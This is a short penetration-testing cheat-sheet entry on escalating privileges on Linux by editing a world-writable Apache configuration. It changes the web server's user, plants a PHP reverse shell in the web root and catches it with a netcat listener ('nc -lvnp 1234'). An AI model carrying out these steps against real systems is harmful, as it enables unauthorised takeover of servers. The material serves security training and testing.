Apache Conf Privilege Escalation
ls -al /etc/apache2
-rwxrwxrwx 1 root root 7094 NOV 7 2023 apache2.conf
Copied!
If we can modify the apache configuration file, we can update the web owner (www-data) to arbitrary user.
First modify “apache.conf” file to change the web user with new one.
# These need to be set in /etc/apache2/envvars
User www-data
Group www-data
Copied!
In the web directory (e.g. /var/www/html
), create the script to reverse shell.
Assume the website uses PHP, so we can create “shell.php” in the web root and insert PHP reverse shell script.
We need to start a listener in local terminal.
nc -lvnp 1234
Copied!
Then access to the web page e.g. https://example.com/shell.php
.
We should get a shell as the desired user.
Last updated